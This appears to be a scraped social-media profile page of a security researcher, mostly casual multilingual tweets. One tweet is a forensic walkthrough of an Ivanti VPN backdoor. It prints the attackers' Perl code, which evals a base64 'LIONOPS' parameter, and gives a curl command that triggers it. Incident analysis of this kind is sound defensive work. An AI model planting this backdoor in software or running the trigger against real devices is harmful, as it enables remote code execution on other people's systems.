Olivia
Online
jz (Heungsoo Kang)
@jz__
Reverse engineering, obfuscation, APT track, tool writing, etc
Burnaby, BC Canada
Joined August 2009
310 Following
436 Followers
1K Posts
@SalenoXP I'm also looking into this, but missing of the version COULD be due to the axios compromise, or COULD ALSO be due to the leak.
@elonmusk what happened to "you either fight back or you die"? https://t.co/pr2jiC9Rmj
@xcoolcat7 오 여행가셨나보군요
점심 먹고 싶다..
Who to follow
for i in range(100):
remind_to_self("I will never buy HP printer ever again")
bought a printer ink cartridge for my folks from https://t.co/nRPSgtUZi9, which does not work with error message. HP refuses to refund. thank you @HP @HPSupport
@IslandPrincessH this came out of IslandPrincess' choco mochi I bought from @Costco . It cut my inner cheek. WTF??
https://t.co/GXcOhydWBS
@nakulmk Hello Mr Nakul,
I'm Kang, DOSI security team. My colleague in DOSI(xxx@linecorp) got an email from you and we're not sure if it's legit. Can you confirm?
@AccessTRW So.. no apology. no surprise.
@vinceflibustier this is brilliant lmao
OMG CrowdStrike...
Favorite scene in Inside Out 2. "Maybe this is what happens when you grow up, you feel less joy"
Tomorrow is BECKS Japan day!
https://t.co/svFHoWCPcP
9 days to go! Come and have a drink in Tokyo Garden Terras Kioicho!
9 days to go! Come and have a drink in Tokyo Garden Terras Kioicho!
5月23日(木)にセキュリティに関するミートアップ「Becks」を開催します。ビールを片手にテクニカルなトークが楽しめます。ぜひご参加をご検討ください。 #becks_jp
https://t.co/MeU1PYNEjv
우리은행 WON인증서 발급하려다가 스트레스받아 기절하는줄 알았다. 간만에 코리안 뱅킹 살짝 맛봤더니...
@AMAZlNGNATURE See-weeeeeeeeeeeeeeeeh
@unpacker Godspeed 성수님!
Getting into Ivanti CVE-2024-21893 In-the-Wild hackers' backdoor:
0. SSRF on saml-server will exploit CVE-2024-21887 vulnerability by bypassing mitigation and will likely crash saml-server
1. In the admin panel, get process snapshot (Troubleshooting > System snapshot)
2. Decrypt snapshot with https://t.co/MeYUPcQqfA (https://t.co/1uF4F4uCuk)
3. $ tar xvf snapshot.decrypted
-> It'll dump coredump (https://t.co/DSDG1ygc67)
4. $ strings https://t.co/DSDG1ygc67 | grep setcookie
-> you'll see attacker's saml xml payload
5. decode (URL, base64) payload and you'll get backdoored version of setcookie.thtml.ttc
following is the backdoored part:
$output .= "<!--\n";
my $keyname = 'LIONOPS';
my $key = CGI::param($keyname);
use MIME::Base64;
if(defined($key)){
my $arg=decode_base64("$key");
eval(decode_base64("$key"));
}
$output .= "-->\n";
"LIONOPS" is the keyword parameter to backdoor, so if you do something like:
$ curl https://your_vpn_server/dana-na/auth/setcookie.cgi?LIONOPS=<base64('print "a"*100')>
then backdoored device is likely to respond with 'a' * 100
#LINESecurity #ivanti #LIONOPS
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.5M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.1M followers
Taylor Swift
@taylorswift13
80.9M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.6M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.2M followers